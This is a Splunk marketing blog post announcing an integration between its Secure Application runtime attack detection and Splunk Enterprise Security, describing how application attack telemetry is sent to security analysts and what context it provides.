Splunk Delivers Unified Security and Observability to Protect Applications

Bring application and security teams together with end-to-end application threat detection and response—right inside Splunk.

Why Application Context Is the Missing Link in Security

As attackers increasingly target the application layer, organizations are under pressure to detect and respond faster—but they’re flying blind without the right context.

Recent research underscores just how urgent and complex today’s application security challenges have become. 68% of organizations leave critical vulnerabilities unresolved for more than 24 hours¹. Even more concerning, 35% say this lack of context directly hinders their ability to remediate vulnerabilities effectively. Meanwhile, the threat landscape is intensifying: there has been a 742% year-over-year increase in attacks targeting open-source vulnerabilities². The consequences are steep—the average cost to contain a breach in the U.S. has reached $9.44 million³, and it takes an average of 277 days to fully contain an incident⁴. Alarmingly, 60% of breaches involve data exfiltration within just one day⁴.

It’s no longer enough to detect vulnerabilities—you need to know what’s being exploited, how, where and in real time.

Introducing: Secure Application and Splunk Security

To address this gap, we’re introducing a new integration between Splunk's Secure Application part of the Splunk Observability portfolio through AppDynamics and Splunk Enterprise Security.

This integration enables real-time application attack detection for hybrid and on-prem environments using the Splunk AppDynamics agents (support for microservices based applications using Splunk Observability Cloud and Open Telemetry is coming soon). It gives security analysts and observability teams a shared source of truth for understanding runtime threats in the context of production and pre-production applications.

Why It Matters

For security teams:
Gain the observability data you've been missing—track actual exploit attempts, understand impacted services, and correlate attacks with indicators of compromise directly in Splunk Security.

For observability teams:
Elevate your role in security—your telemetry data becomes a critical input to protecting the business, helping to flag and fix issues before they become breaches.

How It Works

Secure Application monitors application runtime behavior to detect actual exploit attempts as they happen. When an attack is detected, it captures deep, actionable context—such as method invocations, vulnerable services, input payloads, and exploit metadata—and immediately sends that data to Splunk via HTTP Event Collector (HEC), a standard, secure interface for streaming event data.

Once inside Splunk, this telemetry powers:

• Findings-based detection in Splunk Enterprise Security
• Risk-Based Alerting and Prioritization using Splunk correlation rules
• Enriched with application threat context from Secure Application for smarter triage

Security teams use this information to collaborate with application teams and deploy any remediation workflows from Splunk Enterprise Security and Splunk SOAR

Secure Application and Splunk Enterprise Security end-to-end integration to detect, prioritize and investigate application threats

From Detection to Investigation—Without Losing Context

Secure Application doesn’t just detect the presence of a threat—it gives security and observability teams a detailed breakdown of the threat in application terms. Once ingested, alerts surface directly in Splunk Enterprise Security, correlation searches, and investigation workflows.

Security teams can instantly pivot into runtime insights, including:

• Application service name
• Attack event metadata
• Associated vulnerabilities and CVEs
• Cisco exploitability scores
• Stack traces and invoked methods
• Source IPs and payload characteristics

This deep context enables analysts to pivot directly into application attacks with full application context—understanding not just that something happened, but how, where and why.

Splunk Enterprise Security showing a Log4j notable event generated from Secure Application data with priority score and contextual enrichment

Application-Aware Threat Hunting Has Arrived

Through Secure Application, teams can trace each attack event back to its execution path, understand its potential impact, and correlate it with other infrastructure, identity, or network signals already present in Splunk.

All of this is accessible without switching tools—giving security and observability teams a seamless way to detect and remediate real threats, faster than ever before.

Secure Application Log4j attack view showing real-time attack details including stack trace, service impact, and vulnerable method

Splunk and Cisco: Better Together

This integration showcases the strength of the combined Cisco and Splunk security ecosystem. Vulnerabilities detected at runtime by Secure Application are automatically enriched with exploitability data from Cisco Vulnerability Management (formerly Kenna.VM), helping teams make faster, more informed decisions about what to address first.

Together, Splunk and Cisco help you move beyond alerts and static scans—toward real-time, risk-informed application security.

A New Era of Unified Security and Observability to Drive Digital Resilience

With this integration, Splunk brings runtime application security into the hands of both SOC analysts and observability teams—so they can work together to detect, investigate, and contain threats and drive digital resilience.

By unifying application telemetry with security analytics , organizations can now:

• Detect real-time runtime attacks in hybrid/on-prem apps
• Prioritize and investigate based on exploitability and application impact
• Accelerate cross-team collaboration to contain threats faster

To see how this integration can improve your security posture:

• Contact your Splunk Observability or Security sales lead to schedule a demo
• Dive into the technical integration details here: Read the integration guide
• Attend upcoming Cisco Live 2025 or .conf25 sessions or review the recordings

Let’s stop runtime threats—together.

1- Swimlane 2024 Under Pressure: Is Vulnerability Management Keeping Up?
2 - Sonatype’s 8th Annual State of the Software Supply Chain Report.
3 -Ponemon Institute and IBM report, 2024.
4 - Cisco Security, 2020